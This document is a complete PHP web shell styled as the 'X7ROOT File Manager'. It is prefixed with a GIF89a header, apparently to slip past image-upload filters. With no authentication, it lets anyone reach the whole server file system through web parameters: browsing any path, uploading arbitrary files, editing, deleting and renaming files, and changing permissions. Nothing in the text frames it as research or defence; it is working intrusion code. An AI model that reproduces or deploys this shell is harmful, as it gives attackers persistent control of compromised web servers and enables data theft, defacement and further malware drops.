GIF89a

<?php
/* GIF89a */

$home = $_SERVER['HOME'] ?? '/';
$path = isset($_GET['path']) ? realpath($_GET['path']) : getcwd();
if (!$path || !is_dir($path)) $path = getcwd();
$uploadSuccess = false;
$fileLink = '';
$currentYear = date("Y");
$editContent = '';
$editTarget = '';
$message = '';

function h($str) { return htmlspecialchars($str, ENT_QUOTES); }

// Helper function to get full symbolic permissions
function getFullPermissions($file) {
    $perms = fileperms($file);
    if (($perms & 0xC000) == 0xC000) { $info = 's'; }
    elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; }
    elseif (($perms & 0x8000) == 0x8000) { $info = '-'; }
    elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; }
    elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; }
    elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; }
    elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; }
    else { $info = 'u'; }

    $info .= (($perms & 0x0100) ? 'r' : '-');
    $info .= (($perms & 0x0080) ? 'w' : '-');
    $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
    $info .= (($perms & 0x0020) ? 'r' : '-');
    $info .= (($perms & 0x0010) ? 'w' : '-');
    $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
    $info .= (($perms & 0x0004) ? 'r' : '-');
    $info .= (($perms & 0x0002) ? 'w' : '-');
    $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
    return $info;
}

// Handle POST actions
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (isset($_FILES['upload'])) {
        $dest = $path . '/' . basename($_FILES['upload']['name']);
        if (move_uploaded_file($_FILES['upload']['tmp_name'], $dest)) {
            $message = "<div style='color:#f00;'>✅ File uploaded successfully!</div>";
        } else {
            $message = "<div style='color:#f00;'>❌ File upload failed.</div>";
        }
    } elseif (isset($_POST['chmod'], $_POST['file'])) {
        if (chmod($path . '/' . $_POST['file'], intval($_POST['chmod'], 8))) {
            $message = "<div style='color:#f00;'>✅ Permissions changed successfully.</div>";
        } else {
            $message = "<div style='color:#f00;'>❌ Failed to change permissions.</div>";
        }
    } elseif (isset($_POST['savefile'], $_POST['filename'])) {
        if (file_put_contents($path . '/' . $_POST['filename'], $_POST['savefile'])) {
            $message = "<div style='color:#f00;'>✅ File saved successfully.</div>";
        } else {
            $message = "<div style='color:#f00;'>❌ Failed to save file.</div>";
        }
    } elseif (isset($_POST['rename'], $_POST['oldname'])) {
        if (rename($path . '/' . $_POST['oldname'], $path . '/' . $_POST['rename'])) {
            $message = "<div style='color:#f00;'>✅ File renamed successfully.</div>";
        } else {
            $message = "<div style='color:#f00;'>❌ Failed to rename file.</div>";
        }
    } elseif (isset($_POST['mkdir'], $_POST['dirname'])) {
        if (mkdir($path . '/' . $_POST['dirname'])) {
            $message = "<div style='color:#f00;'>✅ Directory created successfully.</div>";
        } else {
            $message = "<div style='color:#f00;'>❌ Failed to create directory.</div>";
        }
    }
}

// Handle GET actions
if (isset($_GET['edit'])) {
    $editTarget = basename($_GET['edit']);
    $editPath = $path . '/' . $editTarget;
    if (is_file($editPath)) {
        $editContent = htmlspecialchars(file_get_contents($editPath));
    }
}

if (isset($_GET['delete'])) {
    $target = $path . '/' . basename($_GET['delete']);
    if (is_file($target)) {
        if (unlink($target)) {
            $message = "<div style='color:#f00;'>✅ File deleted successfully.</div>";
        } else {
            $message = "<div style='color:#f00;'>❌ Failed to delete file.</div>";
        }
    } elseif (is_dir($target)) {
        if (rmdir($target)) {
            $message = "<div style='color:#f00;'>✅ Directory deleted successfully.</div>";
        } else {
            $message = "<div style='color:#f00;'>❌ Failed to delete directory. (Maybe not empty?)</div>";
        }
    }
}

// Separate files and directories
$items = @scandir($path);
$dirs = [];
$files = [];
if ($items) {
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') continue;
        if (is_dir($path . '/' . $item)) {
            $dirs[] = $item;
        } else {
            $files[] = $item;
        }
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>X7ROOT File Manager</title>
    <style>
        body { background: #111; color: #eee; font-family: monospace; padding: 20px; }
        a { color: #f00; text-decoration: none; }
        a:hover { text-decoration: underline; }
        table { width: 100%; border-collapse: collapse; margin-top: 15px; background: #1c1c1c; }
        th, td { padding: 10px; border: 1px solid #333; text-align: left; }
        th { background: #2a2a2a; color: #f00; }
        input, button, textarea {
            background: #222; color: #eee; border: 1px solid #444; padding: 8px;
            border-radius: 4px; font-family: monospace;
            box-sizing: border-box; width: 100%;
        }
        button, input[type="submit"] { background: #f00; color: #111; font-weight: bold; cursor: pointer; border: 1px solid #f00; width: auto; padding: 8px 12px; }
        button:hover, input[type="submit"]:hover { background: #e00; }
        .breadcrumb a { color: #f00; margin-right: 5px; }
        .breadcrumb span { color: #888; margin: 0 4px; }
        .card { background: #1c1c1c; padding: 15px; border-radius: 8px; box-shadow: 0 0 10px #000; margin-top: 20px; }
        textarea { height: 300px; margin-top: 10px; }
        footer { text-align: center; margin-top: 40px; color: #666; font-size: 0.9em; }
        .perms-safe { color: #0f0; }
        .perms-warn { color: #f00; }
        .message { margin-bottom: 20px; font-size: 1.1em; }
        .actions-cell { white-space: nowrap; }
    </style>
</head>
<body>

<h2>X7ROOT File Manager</h2>
<?php if ($message): ?>
<div class="message"><?= $message ?></div>
<?php endif; ?>

<form method="get">
    <input type="text" name="path" value="<?= h($path) ?>" style="width: 80%; display: inline-block;">
    <button type="submit" style="width: 18%;">Go</button>
</form>

<div class="breadcrumb">
    <?php
    $crumbs = explode('/', trim($path, '/'));
    $accum = '';
    echo '<a href="?path=/">/</a>';
    foreach ($crumbs as $crumb) {
        if ($crumb === '') continue;
        $accum .= '/' . $crumb;
        echo '<span>/</span><a href="?path=' . urlencode($accum) . '">' . h($crumb) . '</a>';
    }
    echo '<span>/</span><a href="?path=' . urlencode($home) . '">[ HOME ]</a>';
    ?>
</div>

<?php if (dirname($path) !== $path): ?>
<p><a href="?path=<?= urlencode(dirname($path)) ?>">⬅️ [ PARENT DIR ]</a></p>
<?php endif; ?>

<hr style="border-top: 1px solid #f00;">

<div style="display: flex; gap: 20px; margin-top: 20px;">
    <div class="card" style="flex: 1;">
        <h3>Upload File</h3>
        <form method="post" enctype="multipart/form-data">
            <input type="file" name="upload" required>
            <button type="submit" style="margin-top: 10px;">📤 Upload</button>
        </form>
    </div>
    <div class="card" style="flex: 1;">
        <h3>Create Folder</h3>
        <form method="post">
            <input type="hidden" name="mkdir" value="1">
            <input type="text" name="dirname" placeholder="Folder Name">
            <button type="submit" style="margin-top: 10px;">➕ Create</button>
        </form>
    </div>
</div>

<?php if ($editTarget): ?>
<div class="card">
    <h3>Editing: <?= h($editTarget) ?></h3>
    <form method="post">
        <input type="hidden" name="filename" value="<?= h($editTarget) ?>">
        <textarea name="savefile"><?= $editContent ?></textarea><br>
        <button type="submit">💾 Save File</button>
    </form>
</div>
<?php endif; ?>

<hr style="border-top: 1px solid #f00;">

<div class="card">
    <h3>Directories</h3>
    <table>
        <tr>
            <th>Name</th>
            <th>Permissions</th>
            <th>Actions</th>
        </tr>
        <?php foreach ($dirs as $item): ?>
        <?php
        $full = $path . '/' . $item;
        $perm = getFullPermissions($full);
        $permClass = (substr($perm, 8, 1) === 'w') ? 'perms-warn' : 'perms-safe';
        ?>
        <tr>
            <td><a href="?path=<?= urlencode($full) ?>">📁 <?= h($item) ?></a></td>
            <td class="<?= $permClass ?>"><?= $perm ?></td>
            <td class="actions-cell">
                <a href="?path=<?= urlencode($path) ?>&delete=<?= urlencode($item) ?>" onclick="return confirm('Delete directory?')" style="color:#f00;">🗑️</a>
            </td>
        </tr>
        <?php endforeach; ?>
    </table>
    
    <h3>Files</h3>
    <table>
        <tr>
            <th>Name</th>
            <th>Size</th>
            <th>Permissions</th>
            <th>Actions</th>
        </tr>
        <?php foreach ($files as $item): ?>
        <?php
        $full = $path . '/' . $item;
        $size = round(filesize($full) / 1024, 2);
        $perm = getFullPermissions($full);
        $permClass = (substr($perm, 8, 1) === 'w') ? 'perms-warn' : 'perms-safe';
        ?>
        <tr>
            <td>📄 <?= h($item) ?></td>
            <td><?= $size ?> kB</td>
            <td class="<?= $permClass ?>"><?= $perm ?></td>
            <td class="actions-cell">
                <a href="?path=<?= urlencode($path) ?>&edit=<?= urlencode($item) ?>">✏️</a> |
                <a href="?path=<?= urlencode($path) ?>&delete=<?= urlencode($item) ?>" onclick="return confirm('Delete file?')" style="color:#f00;">🗑️</a> |
                <a href="<?= h($item) ?>" download>⬇️</a> |
                <form method="post" style="display:inline-block; margin-left:5px;">
                    <input type="hidden" name="oldname" value="<?= h($item) ?>">
                    <input type="text" name="rename" value="<?= h($item) ?>" style="width:100px; display:inline;">
                    <button type="submit" style="font-size: 0.8em; padding: 4px 6px;">Rename</button>
                </form>
            </td>
        </tr>
        <?php endforeach; ?>
    </table>
</div>

<footer>
    © <?= $currentYear ?> | File Manager by <a href="https://t.me/X7ROOT" target="_blank">@X7ROOT</a>
</footer>

</body>
</html>